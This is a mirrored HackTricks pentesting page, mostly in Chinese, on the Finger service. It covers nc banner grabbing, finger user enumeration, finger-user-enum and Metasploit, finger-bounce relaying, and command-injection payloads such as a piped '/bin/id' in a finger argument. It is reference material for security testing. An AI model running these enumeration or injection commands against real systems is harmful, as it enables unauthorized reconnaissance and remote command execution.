mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
97 lines
4.7 KiB
Markdown
97 lines
4.7 KiB
Markdown
# 79 - Pentesting Finger
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
|
||
|
||
**从黑客的角度审视您的网络应用、网络和云**
|
||
|
||
**查找并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,查找让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。
|
||
|
||
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
|
||
|
||
## **基本信息**
|
||
|
||
**Finger** 程序/服务用于检索计算机用户的详细信息。通常,提供的信息包括 **用户的登录名、全名**,在某些情况下,还包括其他详细信息。这些额外的详细信息可能包括办公室位置和电话号码(如果可用)、用户登录的时间、非活动时间(闲置时间)、用户最后一次阅读邮件的时间,以及用户的计划和项目文件的内容。
|
||
|
||
**默认端口:** 79
|
||
```
|
||
PORT STATE SERVICE
|
||
79/tcp open finger
|
||
```
|
||
## **枚举**
|
||
|
||
### **横幅抓取/基本连接**
|
||
```bash
|
||
nc -vn <IP> 79
|
||
echo "root" | nc -vn <IP> 79
|
||
```
|
||
### **用户枚举**
|
||
```bash
|
||
finger @<Victim> #List users
|
||
finger admin@<Victim> #Get info of user
|
||
finger user@<Victim> #Get info of user
|
||
```
|
||
或者你可以使用 **finger-user-enum** 来自 [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum),一些示例:
|
||
```bash
|
||
finger-user-enum.pl -U users.txt -t 10.0.0.1
|
||
finger-user-enum.pl -u root -t 10.0.0.1
|
||
finger-user-enum.pl -U users.txt -T ips.txt
|
||
```
|
||
#### **Nmap 执行脚本以使用默认脚本**
|
||
|
||
### Metasploit 使用的技巧比 Nmap 更多
|
||
```
|
||
use auxiliary/scanner/finger/finger_users
|
||
```
|
||
### Shodan
|
||
|
||
* `port:79 USER`
|
||
|
||
## 命令执行
|
||
```bash
|
||
finger "|/bin/id@example.com"
|
||
finger "|/bin/ls -a /@example.com"
|
||
```
|
||
## Finger Bounce
|
||
|
||
[使用系统作为指纹中继](https://securiteam.com/exploits/2BUQ2RFQ0I/)
|
||
```
|
||
finger user@host@victim
|
||
finger @internal@external
|
||
```
|
||
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
|
||
|
||
**从黑客的角度看待您的网络应用、网络和云**
|
||
|
||
**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,找到让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
|
||
|
||
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
|
||
|
||
{% hint style="success" %}
|
||
学习和实践AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
学习和实践GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>支持HackTricks</summary>
|
||
|
||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
|
||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR来分享黑客技巧。
|
||
|
||
</details>
|
||
{% endhint %}
|